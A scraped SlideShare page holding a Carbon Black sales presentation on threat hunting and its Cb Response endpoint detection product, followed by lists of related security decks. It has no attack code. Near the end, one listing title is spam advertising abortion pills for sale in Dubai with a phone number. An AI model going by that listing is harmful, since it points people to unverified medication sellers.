SlideShare uma empresa Scribd logo

Threat Hunting ve EDR Etkinliği Carbon Black Sunumu

BGA Cyber Security
BGA Cyber Security

Threat Hunting ve EDR Etkinliği Carbon Black Sunumu @BGASecurity

Tecnologia
1 de 15
I © 2017 Carbon Black. All Rights Reserved. I CONFIDENTIAL1 Threat Hunting: Fast and easy with CbR 1-Oct-18 Nagaraj Hebbar Technical Account Manager – Middle East, Turkey & Africa (META)
 CISSP, CISM
Agenda Confidential © 2017 Carbon Black. All Rights Reserved. 01. Threat & Threat hunting - Overview 02. 03. Threat hunting demo Cb Response
I © 2017 Carbon Black. All Rights Reserved. I CONFIDENTIAL3 NON-MALWARE ATTACKS ON THE RISE 47%OF BREACHES USE MALWARE 53%OF BREACHES ARE NON-MALWARE MALWARE ATTACKS NON-MALWARE ATTACKS KNOWN UNKNOWN RANSOM OBFUSCATED MEMORY MACROS REMOTE LOGIN POWERSHELL 93% OF RESEARCHERS SAY NON-MALWARE ATTACKS POSE MORE BUSINESS RISK THAN MALWARE MALWARE + NON-MALWARE
I © 2017 Carbon Black. All Rights Reserved. I CONFIDENTIAL4 Threat vs. Vulnerability vs. Risk • Threat • Anything that can exploit a vulnerability, intentionally or accidentally, and obtain, damage, or destroy an asset • A Threat is what we are trying to protect against • Vulnerability • Weaknesses or gaps in a security program that can be exploited by threats to gain unauthorized asset to an asset • A vulnerability is a weakness or gap in our protection efforts • Risk • The potential for loss, damage or destruction of an asset as a results of a threat exploiting a vulnerability • Risk is the intersection of assets, threats and vulnerabilities
I © 2017 Carbon Black. All Rights Reserved. I CONFIDENTIAL5 Proactive Threat Hunting WHAT IS IT? • Proactive and iterative search for attacks • Informed by in-depth knowledge of your environment • Often hypothesis-based WHAT IS IT NOT? • Out-of-the-box detection • A checklist of indicators of compromise • Applying 3rd party threat intel feeds
I © 2017 Carbon Black. All Rights Reserved. I CONFIDENTIAL6 The Challenges NO REAL-TIME VISIBILITY INTO ADVANCED ATTACKS TIRED OF BEING REACTIVE NO CENTRALIZED ACCESS TO UNFILTERED DATA 91% OF ORGANIZATIONS REPORT INCREASES IN SPEED & ACCURACY OF RESPONSE DUE TO THREAT HUNTING 77% CONSIDER ENDPOINT SECURITY DATA NECESSARY IN THEIR THREAT HUNTING FEEDS The Hunter Strikes Back: The SANS 2017 Threat Hunting Survey
I © 2017 Carbon Black. All Rights Reserved. I CONFIDENTIAL7 ✓ Stops the headline breach ✓ Scales the hunt ✓ Integrates your defenses ✓ Gives you a community of experts How We Solve Those Challenges Advances you from monitoring to proactive threat hunting
I © 2017 Carbon Black. All Rights Reserved. I CONFIDENTIAL8 Detect & Respond Faster with Cb Response
I © 2017 Carbon Black. All Rights Reserved. I CONFIDENTIAL9 Endpoint Security Market Leader 30 of Fortune 100 3,700 Customers 14M Endpoints 13,000 Practitioners 75+ IR/MSSPs 60%+ Y/Y Growth PURPOSE BUILT FOR SOC/IR MARKET-LEADING DETECTION & RESPONSE PRO-ACTIVE THREAT HUNTING
I © 2017 Carbon Black. All Rights Reserved. I CONFIDENTIAL10 Cb Response: IR & Threat Hunting COMPLETE VISIBILITY PROACTIVE THREAT HUNTING REAL-TIME RESPONSE GLOBAL COMMUNITY LEVERAGE
I © 2017 Carbon Black. All Rights Reserved. I CONFIDENTIAL11 Complete Visibility PROCESS ACTIVITY REGISTRY ACTIVITY FILE ACTIVITY NETWORK ACTIVITY IDENTIFY ROOT CAUSE CAPTURE ALL ENDPOINT ACTIVITY AGGREGATE THREAT INTEL VISUALIZE THE ATTACK MINIMIZE RESOURCE IMPACT CONTINUOUS & CENTRALIZED RECORDING
I © 2017 Carbon Black. All Rights Reserved. I CONFIDENTIAL12 CUSTOMIZE WATCHLISTS CAPTURE ALL ENDPOINT ACTIVITY Proactive Threat Hunting CONSOLIDATE THREAT FEEDS OPEN APIs AND INTEGRATIONS MAKE THE NEXT ATTACK HARDER AUTOMATE THE HUNT INTEGRATE DEFENSES STOP THE “HEADLINE” BREACH LEVERAGE COMMUNITY EXPERTS
I © 2017 Carbon Black. All Rights Reserved. I CONFIDENTIAL13 Real-Time Response CUSTOM BANNINGENDPOINT ISOLATION LIVE RESPONSEPROCESS TERMINATION REMEDIATE INFECTED DEVICES ISOLATE INFECTED SYSTEMS PREVENT FUTURE ATTACKS COLLECT FORENSIC DATA
I © 2017 Carbon Black. All Rights Reserved. I CONFIDENTIAL14 1 Market-Leading IR & Threat Hunting COMPLETE VISIBILTY PROACTIVE THREAT HUNTING REAL-TIME RESPONSE PROVEN AT SCALE 2 3 4
© 2017 Carbon Black. All Rights Reserved. I CONFIDENTIAL15 THANK YOU

Recomendados

Carbon Black: Justifying the Value of Endpoint Security
Carbon Black: Justifying the Value of Endpoint SecurityCarbon Black: Justifying the Value of Endpoint Security
Carbon Black: Justifying the Value of Endpoint Security
Mighty Guides, Inc.
 
Carbon Black: 32 Security Experts on Changing Endpoint Security - Quotes from...
Carbon Black: 32 Security Experts on Changing Endpoint Security - Quotes from...Carbon Black: 32 Security Experts on Changing Endpoint Security - Quotes from...
Carbon Black: 32 Security Experts on Changing Endpoint Security - Quotes from...
Mighty Guides, Inc.
 
Evolving Cybersecurity Threats
Evolving Cybersecurity Threats Evolving Cybersecurity Threats
Evolving Cybersecurity Threats
Nevada County Tech Connection
 
BlueVoyant: 7 Experts Share Key Questions To Ask When Evaluating Providers
BlueVoyant: 7 Experts Share Key Questions To Ask When Evaluating ProvidersBlueVoyant: 7 Experts Share Key Questions To Ask When Evaluating Providers
BlueVoyant: 7 Experts Share Key Questions To Ask When Evaluating Providers
Mighty Guides, Inc.
 
State of Endpoint Security: The Buyers Mindset
State of Endpoint Security: The Buyers MindsetState of Endpoint Security: The Buyers Mindset
State of Endpoint Security: The Buyers Mindset
CrowdStrike
 
7 Experts on Implementing Microsoft 365 Defender
7 Experts on Implementing Microsoft 365 Defender7 Experts on Implementing Microsoft 365 Defender
7 Experts on Implementing Microsoft 365 Defender
Mighty Guides, Inc.
 
Proactive Threat Hunting: Game-Changing Endpoint Protection Beyond Alerting
Proactive Threat Hunting: Game-Changing Endpoint Protection Beyond AlertingProactive Threat Hunting: Game-Changing Endpoint Protection Beyond Alerting
Proactive Threat Hunting: Game-Changing Endpoint Protection Beyond Alerting
CrowdStrike
 
Endpoint Detection and Response for Dummies
Endpoint Detection and Response for DummiesEndpoint Detection and Response for Dummies
Endpoint Detection and Response for Dummies
Liberteks
 

Recomendados

Carbon Black: Justifying the Value of Endpoint Security
Carbon Black: Justifying the Value of Endpoint SecurityCarbon Black: Justifying the Value of Endpoint Security
Carbon Black: Justifying the Value of Endpoint Security
Mighty Guides, Inc.
 
Carbon Black: 32 Security Experts on Changing Endpoint Security - Quotes from...
Carbon Black: 32 Security Experts on Changing Endpoint Security - Quotes from...Carbon Black: 32 Security Experts on Changing Endpoint Security - Quotes from...
Carbon Black: 32 Security Experts on Changing Endpoint Security - Quotes from...
Mighty Guides, Inc.
 
Evolving Cybersecurity Threats
Evolving Cybersecurity Threats Evolving Cybersecurity Threats
Evolving Cybersecurity Threats
Nevada County Tech Connection
 
BlueVoyant: 7 Experts Share Key Questions To Ask When Evaluating Providers
BlueVoyant: 7 Experts Share Key Questions To Ask When Evaluating ProvidersBlueVoyant: 7 Experts Share Key Questions To Ask When Evaluating Providers
BlueVoyant: 7 Experts Share Key Questions To Ask When Evaluating Providers
Mighty Guides, Inc.
 
State of Endpoint Security: The Buyers Mindset
State of Endpoint Security: The Buyers MindsetState of Endpoint Security: The Buyers Mindset
State of Endpoint Security: The Buyers Mindset
CrowdStrike
 
7 Experts on Implementing Microsoft 365 Defender
7 Experts on Implementing Microsoft 365 Defender7 Experts on Implementing Microsoft 365 Defender
7 Experts on Implementing Microsoft 365 Defender
Mighty Guides, Inc.
 
Proactive Threat Hunting: Game-Changing Endpoint Protection Beyond Alerting
Proactive Threat Hunting: Game-Changing Endpoint Protection Beyond AlertingProactive Threat Hunting: Game-Changing Endpoint Protection Beyond Alerting
Proactive Threat Hunting: Game-Changing Endpoint Protection Beyond Alerting
CrowdStrike
 
Endpoint Detection and Response for Dummies
Endpoint Detection and Response for DummiesEndpoint Detection and Response for Dummies
Endpoint Detection and Response for Dummies
Liberteks
 
Carbon Black: Keys to Shutting Down Attacks
Carbon Black: Keys to Shutting Down AttacksCarbon Black: Keys to Shutting Down Attacks
Carbon Black: Keys to Shutting Down Attacks
Mighty Guides, Inc.
 
CDM From the Frontlines - CISOs, PMs and Others Share Success Perspectives an...
CDM From the Frontlines - CISOs, PMs and Others Share Success Perspectives an...CDM From the Frontlines - CISOs, PMs and Others Share Success Perspectives an...
CDM From the Frontlines - CISOs, PMs and Others Share Success Perspectives an...
Mighty Guides, Inc.
 
CounterTack: 10 Experts on Active Threat Management
CounterTack: 10 Experts on Active Threat ManagementCounterTack: 10 Experts on Active Threat Management
CounterTack: 10 Experts on Active Threat Management
Mighty Guides, Inc.
 
Using Security Metrics to Drive Action in Asia Pacific - 22 Experts Share How...
Using Security Metrics to Drive Action in Asia Pacific - 22 Experts Share How...Using Security Metrics to Drive Action in Asia Pacific - 22 Experts Share How...
Using Security Metrics to Drive Action in Asia Pacific - 22 Experts Share How...
Mighty Guides, Inc.
 
Hexis Cybersecurity Mission Possible: Taming Rogue Ghost Alerts
Hexis Cybersecurity Mission Possible: Taming Rogue Ghost AlertsHexis Cybersecurity Mission Possible: Taming Rogue Ghost Alerts
Hexis Cybersecurity Mission Possible: Taming Rogue Ghost Alerts
Hexis Cyber Solutions
 
Trustwave: 7 Experts on Transforming Your Threat Detection & Response Strategy
Trustwave: 7 Experts on Transforming Your Threat Detection & Response StrategyTrustwave: 7 Experts on Transforming Your Threat Detection & Response Strategy
Trustwave: 7 Experts on Transforming Your Threat Detection & Response Strategy
Mighty Guides, Inc.
 
REDUCING CYBER EXPOSURE From Cloud to Containers
REDUCING CYBER EXPOSURE From Cloud to ContainersREDUCING CYBER EXPOSURE From Cloud to Containers
REDUCING CYBER EXPOSURE From Cloud to Containers
artseremis
 
POV - Enterprise Security Canvas
POV - Enterprise Security CanvasPOV - Enterprise Security Canvas
POV - Enterprise Security Canvas
Robert Greiner
 
7 Experts on Implementing Microsoft Defender for Endpoint
7 Experts on Implementing Microsoft Defender for Endpoint7 Experts on Implementing Microsoft Defender for Endpoint
7 Experts on Implementing Microsoft Defender for Endpoint
Mighty Guides, Inc.
 
Challenging Insecurity: A Roadmap to Cyber Confidence
Challenging Insecurity: A Roadmap to Cyber ConfidenceChallenging Insecurity: A Roadmap to Cyber Confidence
Challenging Insecurity: A Roadmap to Cyber Confidence
S-RM Risk and Intelligence Consulting
 
Cyber security report 2017 cisco 2017 acr_pdf
Cyber security report 2017 cisco 2017 acr_pdfCyber security report 2017 cisco 2017 acr_pdf
Cyber security report 2017 cisco 2017 acr_pdf
Mitch Cardoza, SPHR, Workforce Solutions Exec.
 
A recommendation for software development responses for future
A recommendation for software development responses for futureA recommendation for software development responses for future
A recommendation for software development responses for future
Max Justice
 
2016 Scalar Security Study Roadshow
2016 Scalar Security Study Roadshow2016 Scalar Security Study Roadshow
2016 Scalar Security Study Roadshow
Scalar Decisions
 
Risksense: 7 Experts on Threat and Vulnerability Management
Risksense: 7 Experts on Threat and Vulnerability ManagementRisksense: 7 Experts on Threat and Vulnerability Management
Risksense: 7 Experts on Threat and Vulnerability Management
Mighty Guides, Inc.
 
EMEA: Using Security Metrics to Drive Action - 22 Experts Share How to Commun...
EMEA: Using Security Metrics to Drive Action - 22 Experts Share How to Commun...EMEA: Using Security Metrics to Drive Action - 22 Experts Share How to Commun...
EMEA: Using Security Metrics to Drive Action - 22 Experts Share How to Commun...
Mighty Guides, Inc.
 
2016 Scalar Security Study: The Cyber Security Readiness of Canadian Organiza...
2016 Scalar Security Study: The Cyber Security Readiness of Canadian Organiza...2016 Scalar Security Study: The Cyber Security Readiness of Canadian Organiza...
2016 Scalar Security Study: The Cyber Security Readiness of Canadian Organiza...
Scalar Decisions
 
2018 State of Cyber Resilience Insurance
2018 State of Cyber Resilience Insurance2018 State of Cyber Resilience Insurance
2018 State of Cyber Resilience Insurance
Accenture Insurance
 
12 Top Talks from the 2017 R-CISC Summit
12 Top Talks from the 2017 R-CISC Summit12 Top Talks from the 2017 R-CISC Summit
12 Top Talks from the 2017 R-CISC Summit
Tripwire
 
Executive Summary of the 2016 Scalar Security Study
Executive Summary of the 2016 Scalar Security StudyExecutive Summary of the 2016 Scalar Security Study
Executive Summary of the 2016 Scalar Security Study
Scalar Decisions
 
Scalar security study2017_slideshare_rev[1]
Scalar security study2017_slideshare_rev[1]Scalar security study2017_slideshare_rev[1]
Scalar security study2017_slideshare_rev[1]
Tracey Ong
 
Cisco Connect 2018 Malaysia - Changing the equation-cybersecurity in digital ...
Cisco Connect 2018 Malaysia - Changing the equation-cybersecurity in digital ...Cisco Connect 2018 Malaysia - Changing the equation-cybersecurity in digital ...
Cisco Connect 2018 Malaysia - Changing the equation-cybersecurity in digital ...
NetworkCollaborators
 
Avoiding Sophisticated Targeted Breach Critical Guidance Healthcare
Avoiding Sophisticated Targeted Breach Critical Guidance HealthcareAvoiding Sophisticated Targeted Breach Critical Guidance Healthcare
Avoiding Sophisticated Targeted Breach Critical Guidance Healthcare
Cybereason
 

Mais conteúdo relacionado

Mais procurados

Mais procurados (20)

Carbon Black: Keys to Shutting Down Attacks
Carbon Black: Keys to Shutting Down AttacksCarbon Black: Keys to Shutting Down Attacks
Carbon Black: Keys to Shutting Down Attacks
 
CDM From the Frontlines - CISOs, PMs and Others Share Success Perspectives an...
CDM From the Frontlines - CISOs, PMs and Others Share Success Perspectives an...CDM From the Frontlines - CISOs, PMs and Others Share Success Perspectives an...
CDM From the Frontlines - CISOs, PMs and Others Share Success Perspectives an...
 
CounterTack: 10 Experts on Active Threat Management
CounterTack: 10 Experts on Active Threat ManagementCounterTack: 10 Experts on Active Threat Management
CounterTack: 10 Experts on Active Threat Management
 
Using Security Metrics to Drive Action in Asia Pacific - 22 Experts Share How...
Using Security Metrics to Drive Action in Asia Pacific - 22 Experts Share How...Using Security Metrics to Drive Action in Asia Pacific - 22 Experts Share How...
Using Security Metrics to Drive Action in Asia Pacific - 22 Experts Share How...
 
Hexis Cybersecurity Mission Possible: Taming Rogue Ghost Alerts
Hexis Cybersecurity Mission Possible: Taming Rogue Ghost AlertsHexis Cybersecurity Mission Possible: Taming Rogue Ghost Alerts
Hexis Cybersecurity Mission Possible: Taming Rogue Ghost Alerts
 
Trustwave: 7 Experts on Transforming Your Threat Detection & Response Strategy
Trustwave: 7 Experts on Transforming Your Threat Detection & Response StrategyTrustwave: 7 Experts on Transforming Your Threat Detection & Response Strategy
Trustwave: 7 Experts on Transforming Your Threat Detection & Response Strategy
 
REDUCING CYBER EXPOSURE From Cloud to Containers
REDUCING CYBER EXPOSURE From Cloud to ContainersREDUCING CYBER EXPOSURE From Cloud to Containers
REDUCING CYBER EXPOSURE From Cloud to Containers
 
POV - Enterprise Security Canvas
POV - Enterprise Security CanvasPOV - Enterprise Security Canvas
POV - Enterprise Security Canvas
 
7 Experts on Implementing Microsoft Defender for Endpoint
7 Experts on Implementing Microsoft Defender for Endpoint7 Experts on Implementing Microsoft Defender for Endpoint
7 Experts on Implementing Microsoft Defender for Endpoint
 
Challenging Insecurity: A Roadmap to Cyber Confidence
Challenging Insecurity: A Roadmap to Cyber ConfidenceChallenging Insecurity: A Roadmap to Cyber Confidence
Challenging Insecurity: A Roadmap to Cyber Confidence
 
Cyber security report 2017 cisco 2017 acr_pdf
Cyber security report 2017 cisco 2017 acr_pdfCyber security report 2017 cisco 2017 acr_pdf
Cyber security report 2017 cisco 2017 acr_pdf
 
A recommendation for software development responses for future
A recommendation for software development responses for futureA recommendation for software development responses for future
A recommendation for software development responses for future
 
2016 Scalar Security Study Roadshow
2016 Scalar Security Study Roadshow2016 Scalar Security Study Roadshow
2016 Scalar Security Study Roadshow
 
Risksense: 7 Experts on Threat and Vulnerability Management
Risksense: 7 Experts on Threat and Vulnerability ManagementRisksense: 7 Experts on Threat and Vulnerability Management
Risksense: 7 Experts on Threat and Vulnerability Management
 
EMEA: Using Security Metrics to Drive Action - 22 Experts Share How to Commun...
EMEA: Using Security Metrics to Drive Action - 22 Experts Share How to Commun...EMEA: Using Security Metrics to Drive Action - 22 Experts Share How to Commun...
EMEA: Using Security Metrics to Drive Action - 22 Experts Share How to Commun...
 
2016 Scalar Security Study: The Cyber Security Readiness of Canadian Organiza...
2016 Scalar Security Study: The Cyber Security Readiness of Canadian Organiza...2016 Scalar Security Study: The Cyber Security Readiness of Canadian Organiza...
2016 Scalar Security Study: The Cyber Security Readiness of Canadian Organiza...
 
2018 State of Cyber Resilience Insurance
2018 State of Cyber Resilience Insurance2018 State of Cyber Resilience Insurance
2018 State of Cyber Resilience Insurance
 
12 Top Talks from the 2017 R-CISC Summit
12 Top Talks from the 2017 R-CISC Summit12 Top Talks from the 2017 R-CISC Summit
12 Top Talks from the 2017 R-CISC Summit
 
Executive Summary of the 2016 Scalar Security Study
Executive Summary of the 2016 Scalar Security StudyExecutive Summary of the 2016 Scalar Security Study
Executive Summary of the 2016 Scalar Security Study
 
Scalar security study2017_slideshare_rev[1]
Scalar security study2017_slideshare_rev[1]Scalar security study2017_slideshare_rev[1]
Scalar security study2017_slideshare_rev[1]
 

Semelhante a Threat Hunting ve EDR Etkinliği Carbon Black Sunumu

You Can't Stop The Breach Without Prevention And Detection
You Can't Stop The Breach Without Prevention And DetectionYou Can't Stop The Breach Without Prevention And Detection
You Can't Stop The Breach Without Prevention And Detection
CrowdStrike
 
Rethinking Cyber-Security: 7 Key Strategies for the Challenges that Lie Ahead
Rethinking Cyber-Security: 7 Key Strategies for the Challenges that Lie AheadRethinking Cyber-Security: 7 Key Strategies for the Challenges that Lie Ahead
Rethinking Cyber-Security: 7 Key Strategies for the Challenges that Lie Ahead
OpenDNS
 
How to Improve Threat Detection & Simplify Security Operations
How to Improve Threat Detection & Simplify Security OperationsHow to Improve Threat Detection & Simplify Security Operations
How to Improve Threat Detection & Simplify Security Operations
IBM Security
 

Semelhante a Threat Hunting ve EDR Etkinliği Carbon Black Sunumu (20)

Cisco Connect 2018 Malaysia - Changing the equation-cybersecurity in digital ...
Cisco Connect 2018 Malaysia - Changing the equation-cybersecurity in digital ...Cisco Connect 2018 Malaysia - Changing the equation-cybersecurity in digital ...
Cisco Connect 2018 Malaysia - Changing the equation-cybersecurity in digital ...
 
Avoiding Sophisticated Targeted Breach Critical Guidance Healthcare
Avoiding Sophisticated Targeted Breach Critical Guidance HealthcareAvoiding Sophisticated Targeted Breach Critical Guidance Healthcare
Avoiding Sophisticated Targeted Breach Critical Guidance Healthcare
 
Cisco Connect 2018 Malaysia - Cisco incident response services-strengthen you...
Cisco Connect 2018 Malaysia - Cisco incident response services-strengthen you...Cisco Connect 2018 Malaysia - Cisco incident response services-strengthen you...
Cisco Connect 2018 Malaysia - Cisco incident response services-strengthen you...
 
Synopsys Security Event Israel Presentation: Case Study: OSS Management – The...
Synopsys Security Event Israel Presentation: Case Study: OSS Management – The...Synopsys Security Event Israel Presentation: Case Study: OSS Management – The...
Synopsys Security Event Israel Presentation: Case Study: OSS Management – The...
 
David Tweedale - The Evolving Threat Landscape #midscybersecurity18
David Tweedale - The Evolving Threat Landscape #midscybersecurity18David Tweedale - The Evolving Threat Landscape #midscybersecurity18
David Tweedale - The Evolving Threat Landscape #midscybersecurity18
 
High Performance Security Report - High Technology
High Performance Security Report - High TechnologyHigh Performance Security Report - High Technology
High Performance Security Report - High Technology
 
Defining A Cyber Moonshot: Getting Safer in Five Years
Defining A Cyber Moonshot: Getting Safer in Five YearsDefining A Cyber Moonshot: Getting Safer in Five Years
Defining A Cyber Moonshot: Getting Safer in Five Years
 
CWIN17 Rome / A holostic cybersecurity
CWIN17 Rome / A holostic cybersecurityCWIN17 Rome / A holostic cybersecurity
CWIN17 Rome / A holostic cybersecurity
 
You Can't Stop The Breach Without Prevention And Detection
You Can't Stop The Breach Without Prevention And DetectionYou Can't Stop The Breach Without Prevention And Detection
You Can't Stop The Breach Without Prevention And Detection
 
Rethinking Cyber-Security: 7 Key Strategies for the Challenges that Lie Ahead
Rethinking Cyber-Security: 7 Key Strategies for the Challenges that Lie AheadRethinking Cyber-Security: 7 Key Strategies for the Challenges that Lie Ahead
Rethinking Cyber-Security: 7 Key Strategies for the Challenges that Lie Ahead
 
Cisco Connect 2018 Singapore - Cisco Incident Response Services
Cisco Connect 2018 Singapore - Cisco Incident Response ServicesCisco Connect 2018 Singapore - Cisco Incident Response Services
Cisco Connect 2018 Singapore - Cisco Incident Response Services
 
Webinar-MSP+ Cyber Insurance Fina.pptx
Webinar-MSP+ Cyber Insurance Fina.pptxWebinar-MSP+ Cyber Insurance Fina.pptx
Webinar-MSP+ Cyber Insurance Fina.pptx
 
Outside the (Black) Box: Protecting Core Operations in Energy
Outside the (Black) Box: Protecting Core Operations in EnergyOutside the (Black) Box: Protecting Core Operations in Energy
Outside the (Black) Box: Protecting Core Operations in Energy
 
Netwatcher Credit Union Tech Talk
Netwatcher Credit Union Tech TalkNetwatcher Credit Union Tech Talk
Netwatcher Credit Union Tech Talk
 
Mastering next gen-siem-usecases-part1
Mastering next gen-siem-usecases-part1Mastering next gen-siem-usecases-part1
Mastering next gen-siem-usecases-part1
 
Debunked: 5 Myths About Zero Trust Security
Debunked: 5 Myths About Zero Trust SecurityDebunked: 5 Myths About Zero Trust Security
Debunked: 5 Myths About Zero Trust Security
 
Cloud Security & Privacy Standard Slide
Cloud Security & Privacy Standard SlideCloud Security & Privacy Standard Slide
Cloud Security & Privacy Standard Slide
 
How to Improve Threat Detection & Simplify Security Operations
How to Improve Threat Detection & Simplify Security OperationsHow to Improve Threat Detection & Simplify Security Operations
How to Improve Threat Detection & Simplify Security Operations
 
ISACA 2019 Amman Chapter - Shah Sheikh - Cyber Resilience
ISACA 2019 Amman Chapter - Shah Sheikh - Cyber ResilienceISACA 2019 Amman Chapter - Shah Sheikh - Cyber Resilience
ISACA 2019 Amman Chapter - Shah Sheikh - Cyber Resilience
 
Atelier Technique SYMANTEC ACSS 2018
Atelier Technique SYMANTEC ACSS 2018Atelier Technique SYMANTEC ACSS 2018
Atelier Technique SYMANTEC ACSS 2018
 

Mais de BGA Cyber Security

Aktif Dizin (Active Directory) Güvenlik Testleri - I: Bilgi Toplama
Aktif Dizin (Active Directory) Güvenlik Testleri - I: Bilgi ToplamaAktif Dizin (Active Directory) Güvenlik Testleri - I: Bilgi Toplama
Aktif Dizin (Active Directory) Güvenlik Testleri - I: Bilgi Toplama
BGA Cyber Security
 

Mais de BGA Cyber Security (20)

WEBSOCKET Protokolünün Derinlemesine İncelenmesi
WEBSOCKET Protokolünün Derinlemesine İncelenmesiWEBSOCKET Protokolünün Derinlemesine İncelenmesi
WEBSOCKET Protokolünün Derinlemesine İncelenmesi
 
Tatil Öncesi Güvenlik Kontrol Listesi.pdf
Tatil Öncesi Güvenlik Kontrol Listesi.pdfTatil Öncesi Güvenlik Kontrol Listesi.pdf
Tatil Öncesi Güvenlik Kontrol Listesi.pdf
 
Ücretsiz Bilgi Güvenliği Farkındalık Eğitimi
Ücretsiz Bilgi Güvenliği Farkındalık EğitimiÜcretsiz Bilgi Güvenliği Farkındalık Eğitimi
Ücretsiz Bilgi Güvenliği Farkındalık Eğitimi
 
3. parti firma risklerinden nasıl korunulur?
3. parti firma risklerinden nasıl korunulur?3. parti firma risklerinden nasıl korunulur?
3. parti firma risklerinden nasıl korunulur?
 
Bir Ransomware Saldırısının Anatomisi. A'dan Z'ye Ransomware Saldırıları
Bir Ransomware Saldırısının Anatomisi. A'dan Z'ye Ransomware SaldırılarıBir Ransomware Saldırısının Anatomisi. A'dan Z'ye Ransomware Saldırıları
Bir Ransomware Saldırısının Anatomisi. A'dan Z'ye Ransomware Saldırıları
 
Webinar: Popüler black marketler
Webinar: Popüler black marketlerWebinar: Popüler black marketler
Webinar: Popüler black marketler
 
Webinar: SOC Ekipleri için MITRE ATT&CK Kullanım Senaryoları
Webinar: SOC Ekipleri için MITRE ATT&CK Kullanım SenaryolarıWebinar: SOC Ekipleri için MITRE ATT&CK Kullanım Senaryoları
Webinar: SOC Ekipleri için MITRE ATT&CK Kullanım Senaryoları
 
Açık Kaynak Kodlu Çözümler Kullanarak SOC Yönetimi SOAR & IRM Webinar - 2020
Açık Kaynak Kodlu Çözümler Kullanarak SOC Yönetimi SOAR & IRM Webinar - 2020Açık Kaynak Kodlu Çözümler Kullanarak SOC Yönetimi SOAR & IRM Webinar - 2020
Açık Kaynak Kodlu Çözümler Kullanarak SOC Yönetimi SOAR & IRM Webinar - 2020
 
DNS Protokolüne Yönelik Güncel Saldırı Teknikleri & Çözüm Önerileri
DNS Protokolüne Yönelik Güncel Saldırı Teknikleri & Çözüm ÖnerileriDNS Protokolüne Yönelik Güncel Saldırı Teknikleri & Çözüm Önerileri
DNS Protokolüne Yönelik Güncel Saldırı Teknikleri & Çözüm Önerileri
 
Webinar: Siber Güvenlikte Olgunluk Seviyesini Arttırmak
Webinar: Siber Güvenlikte Olgunluk Seviyesini ArttırmakWebinar: Siber Güvenlikte Olgunluk Seviyesini Arttırmak
Webinar: Siber Güvenlikte Olgunluk Seviyesini Arttırmak
 
Open Source Soc Araçları Eğitimi 2020-II
Open Source Soc Araçları Eğitimi 2020-IIOpen Source Soc Araçları Eğitimi 2020-II
Open Source Soc Araçları Eğitimi 2020-II
 
Webinar Sunumu: Saldırı, Savunma ve Loglama Açısından Konteyner Güvenliği
Webinar Sunumu: Saldırı, Savunma ve Loglama Açısından Konteyner GüvenliğiWebinar Sunumu: Saldırı, Savunma ve Loglama Açısından Konteyner Güvenliği
Webinar Sunumu: Saldırı, Savunma ve Loglama Açısından Konteyner Güvenliği
 
Hacklenmiş Windows Sistem Analizi
Hacklenmiş Windows Sistem AnaliziHacklenmiş Windows Sistem Analizi
Hacklenmiş Windows Sistem Analizi
 
Open Source SOC Kurulumu
Open Source SOC KurulumuOpen Source SOC Kurulumu
Open Source SOC Kurulumu
 
RAKAMLARIN DİLİ İLE 2020 YILI SIZMA TESTLERİ
RAKAMLARIN DİLİ İLE 2020 YILI SIZMA TESTLERİRAKAMLARIN DİLİ İLE 2020 YILI SIZMA TESTLERİ
RAKAMLARIN DİLİ İLE 2020 YILI SIZMA TESTLERİ
 
Siber Fidye 2020 Raporu
Siber Fidye 2020 RaporuSiber Fidye 2020 Raporu
Siber Fidye 2020 Raporu
 
BGA Türkiye Bankacılık Sektörü 1. Çeyrek Phishing Raporu
BGA Türkiye Bankacılık Sektörü 1. Çeyrek Phishing RaporuBGA Türkiye Bankacılık Sektörü 1. Çeyrek Phishing Raporu
BGA Türkiye Bankacılık Sektörü 1. Çeyrek Phishing Raporu
 
SOC Kurulumu ve Yönetimi İçin Açık Kaynak Kodlu Çözümler
SOC Kurulumu ve Yönetimi İçin Açık Kaynak Kodlu ÇözümlerSOC Kurulumu ve Yönetimi İçin Açık Kaynak Kodlu Çözümler
SOC Kurulumu ve Yönetimi İçin Açık Kaynak Kodlu Çözümler
 
Veri Sızıntıları İçinden Bilgi Toplama: Distributed Denial of Secrets
Veri Sızıntıları İçinden Bilgi Toplama: Distributed Denial of SecretsVeri Sızıntıları İçinden Bilgi Toplama: Distributed Denial of Secrets
Veri Sızıntıları İçinden Bilgi Toplama: Distributed Denial of Secrets
 
Aktif Dizin (Active Directory) Güvenlik Testleri - I: Bilgi Toplama
Aktif Dizin (Active Directory) Güvenlik Testleri - I: Bilgi ToplamaAktif Dizin (Active Directory) Güvenlik Testleri - I: Bilgi Toplama
Aktif Dizin (Active Directory) Güvenlik Testleri - I: Bilgi Toplama
 

Último

Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Miguel Araújo
 
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot TakeoffStrategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
sammart93
 
A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?
Igalia
 
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
?#DUbAI#??##{{(☎️+971_581248768%)**%*]'#abortion pills for sale in dubai@
 

Último (20)

Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
 
presentation ICT roal in 21st century education
presentation ICT roal in 21st century educationpresentation ICT roal in 21st century education
presentation ICT roal in 21st century education
 
A Beginners Guide to Building a RAG App Using Open Source Milvus
A Beginners Guide to Building a RAG App Using Open Source MilvusA Beginners Guide to Building a RAG App Using Open Source Milvus
A Beginners Guide to Building a RAG App Using Open Source Milvus
 
Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...
